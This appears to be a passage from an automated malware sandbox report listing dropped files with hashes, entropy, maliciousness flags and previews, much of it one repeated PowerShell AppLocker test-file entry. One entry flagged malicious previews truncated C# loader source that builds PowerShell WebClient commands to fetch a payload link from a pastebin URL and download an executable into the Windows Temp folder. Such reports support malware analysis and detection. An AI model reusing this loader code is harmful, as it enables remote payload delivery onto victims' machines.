                                                                                                                                                          SHA-512:1FA2D08B6F57BB73862661E17FB216C55E26BE711630EAABE291370013C9FBD66265C4250468211886BCBE68395B9E2D49D2CC762F957C6A3A4B648BD1AF8BE7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:L.....Ag.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP................+l.....W.oc.`0...........4.......C:\Users\user\AppData\Local\Temp\RES4E05.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.u.q.g.i.n.2.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):652
                                                                                                                                                          Entropy (8bit):3.105869404040282
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBHOak7YnqqiHPPN5Dlq5J:+RI+ycuZhN7HOakSiHPPNnqX
                                                                                                                                                          MD5:CA2B6CA8BBC0DAC757816F631F6030A5
                                                                                                                                                          SHA1:7B4528AC85404AD485B656662F0B5E7E55255A92
                                                                                                                                                          SHA-256:494474A54A1F5CD4F23D2AA6FF2513AD3AD5C78F397C3D0E2CBC369C4DE935B2
                                                                                                                                                          SHA-512:E2A4825618E0B4C902C215D3C382A758B991AABFF6BEA758298A45722C4138BA59829DB20E5DBC291FB13022933D147A14060D247810A73BB670648CA89562CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.u.q.g.i.n.2.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.u.q.g.i.n.2.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3608
                                                                                                                                                          Entropy (8bit):4.674309527372753
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:JoOUVpkXLZArHN58uJlPmqDXz9dkLMqF/E:qpk7QlRDXppEM
                                                                                                                                                          MD5:9328E9B30EB919743B2E9739999335C3
                                                                                                                                                          SHA1:E6CE274A36E5F78A2F46A6B92F534755E3938261
                                                                                                                                                          SHA-256:3720A26EE04FADC5ECDC14C9FBF7A1C75AEA6F58029E1F6879CE9CAB8A0FAAB7
                                                                                                                                                          SHA-512:79707E84492961B29C44F820F137E9D607F0DE5392C052018E79541754D412F5B798ADE0A6C621E17D7747FD385F913EAE4B077986612F984B31885E6919B87E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs, Author: Joe Security
                                                                                                                                                          Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Threading;....public class HomeP..{.. public static void GetLoader(string pastebinUrl).. {.. string tempExePath = Path.Combine("C:\\Windows\\Temp", Path.GetRandomFileName().Replace(".", "") + ".exe");.... string psCommandGetLink = "(New-Object System.Net.WebClient).DownloadString('" + pastebinUrl + "')";.... string psCommandDownloadExe = "(New-Object System.Net.WebClient).DownloadFile(" + psCommandGetLink + ", '" + tempExePath + "')";.... using (Process powerShell = new Process()).. {.. powerShell.StartInfo.FileName = "powershell";.. powerShell.StartInfo.Arguments = "-Command \"" + psCommandGetLink + "; " + psCommandDownloadExe + "\"";.. powerShell.StartInfo.RedirectStandardOutput = true;.. powerShell.StartInfo.RedirectStandardError = true;.. powerShell.StartInfo.UseShellExecute = false;.. powerShell.Start
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):183
                                                                                                                                                          Entropy (8bit):5.03686908344896
                                                                                                                                                          Encrypted:false
